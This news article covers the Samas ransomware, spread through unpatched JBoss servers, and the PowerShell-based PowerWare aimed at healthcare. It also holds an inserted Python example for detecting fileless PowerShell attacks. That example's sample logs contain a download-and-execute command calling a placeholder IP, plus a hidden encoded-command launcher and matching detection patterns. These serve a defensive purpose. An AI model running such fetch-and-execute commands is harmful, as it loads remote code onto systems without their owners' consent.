
Security researchers warn of server-attacking ransomware

New strain of ransomware said to be distributed by compromising servers and using them to move through networks to encrypt and hold multiple data sets to ransom

As a growing number of US hospitals report ransomware attacks, researchers are warning of a new strain of ransomware targeting the healthcare sector that attacks servers in order to lock up entire networks.

Unlike most other malware that encrypts data and demands ransom for its release, the Samas strain of ransomware does not rely on user-focused attack vectors such as phishing emails.

Instead, Samas – also known as Samsam and MSIL.B/C – is distributed by compromising servers and using them to move laterally through networks to encrypt and hold multiple data sets to ransom.

Samas compromises servers by exploiting known vulnerabilities in unpatched versions of the JBoss application server software; vulnerable servers are identified using the Jexboss open-source network-scanning tool.

Samas then encrypts hundreds of different file types with the Rijndael algorithm, and protects the Rijndael key by encrypting it with 2048-bit RSA, according to Nick Biasini, security researcher at Cisco Talos.

“This makes the files unrecoverable unless the author made a mistake in the implementation of the encryption algorithms,” he wrote in a blog post.

Samas is also unusual in that once it is installed, it is self-sufficient and there is no communication with command and control servers, making it harder to detect.

The FBI is asking US businesses and software security experts for emergency help in its investigation of Samas, reports Reuters.

In a confidential advisory obtained by Reuters, the FBI provided a list of technical indicators to help companies determine if they were victims of Samas and to enable network defence activities to reduce the risk of similar attacks in future.

However, like most other forms of ransomware, Samas demands payment in bitcoin and in some cases has offered payment options for multiple files, according to Biasini.

During the Cisco Talos investigation, he said researchers found multiple bitcoin wallets being presented to users containing a total of around 275 bitcoins worth about $115,000.


Biasini believes ransomware will continue to be a threat to the internet until attackers find a more profitable technique.

“Protection against such threats is best achieved using a multi-tier defence architecture to ensure potential threats are scanned multiple times,” he said. “However, one of the most effective ways to protect yourself is by simply backing up valuable files.”

According to Biasini, targeted organisations often find that when backups are most needed, they are either non-existent or incomplete.

“These lapses provide the revenue stream that is currently fuelling the development of ransomware,” he said.

Ransomware is one of the top international cyber threats, along with distributed denial of service (DDoS) attacks and bullet-proof hosting services, according to the UK National Crime Agency.

Research has shown that relatively low-cost ransomware attacks typically net thousands of pounds a week for attackers.

Warnings about Samas ransomware coincide with similar warnings by Carbon Black about ransomware created using Microsoft’s PowerShell scripting language for system administration.

Dubbed “PowerWare”, the ransomware is also being used to target organisations in the healthcare sector, as well as other enterprises.

By using PowerShell to retrieve and execute the malicious code, the ransomware can avoid writing new files to disk and blend in with legitimate activity, making it much harder to detect.
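The fileless pattern described above, PowerShell fetching code over the network and running it in memory without writing a file, is what a detection rule over PowerShell script-block logs can key on. The following is an added example and is not code from the article, Cisco Talos or Carbon Black; the log entries, user names, URLs and the 203.0.113.5 address are constructed for illustration.

```python
import re

# Constructed PowerShell script-block log entries (the shape of Windows
# "PowerShell Operational" 4104 events), written for this example; they are
# not taken from the article or from any real PowerWare sample.
SAMPLE_EVENTS = [
    {"id": 1, "user": "CORP\\svc_backup",
     "script": "Get-ChildItem C:\\Backups | Where-Object { $_.LastWriteTime -lt (Get-Date).AddDays(-7) }"},
    {"id": 2, "user": "CORP\\jdoe",
     "script": "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/stage.ps1')"},
    {"id": 3, "user": "CORP\\jdoe",
     "script": "powershell.exe -NoProfile -WindowStyle Hidden -EncodedCommand <base64-placeholder>"},
    {"id": 4, "user": "CORP\\admin",
     "script": "Invoke-WebRequest -Uri https://updates.example.test/agent.msi -OutFile C:\\Temp\\agent.msi"},
]

# Cmdlets/methods that pull content from the network into a variable or pipeline.
FETCH = re.compile(r"DownloadString|DownloadData|Invoke-WebRequest|\biwr\b|Invoke-RestMethod|\birm\b", re.I)
# Evaluation of text as code: this is what turns a fetched string into a payload that never touches disk.
EXEC_IN_MEMORY = re.compile(r"\biex\b|Invoke-Expression", re.I)
# Launcher flags that hide the console and obscure the command line from casual review.
ENCODED = re.compile(r"-e(nc(odedcommand)?)?\b", re.I)
HIDDEN = re.compile(r"-w(indowstyle)?\s+hidden", re.I)


def classify(script):
    """Return the detection reasons that apply to one script block (empty list = not flagged)."""
    reasons = []
    if FETCH.search(script) and EXEC_IN_MEMORY.search(script):
        reasons.append("network fetch piped to in-memory execution")
    if ENCODED.search(script) and HIDDEN.search(script):
        reasons.append("encoded command launched with hidden window")
    return reasons


def find_suspicious(events):
    """Map event id -> reasons for every event that triggers at least one rule."""
    flagged = {}
    for event in events:
        reasons = classify(event["script"])
        if reasons:
            flagged[event["id"]] = reasons
    return flagged


if __name__ == "__main__":
    for event_id, why in find_suspicious(SAMPLE_EVENTS).items():
        print(f"event {event_id}: {'; '.join(why)}")
```

Event 4 downloads to a file and is not flagged: an ordinary download leaves a file for antivirus and file-integrity tooling to inspect, whereas the fetch-and-evaluate form in event 2 is the fileless behaviour the article describes.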


1 comment


This is an unending problem. It breaks, we fix, it breaks again... Loop. Repeat. Either we build a perpetual motion machine (presumably linked to our bank account) or we finally get down to fixing the problem. Easy? Hell no. Essential? Hell yes. So what is Big Business waiting for...?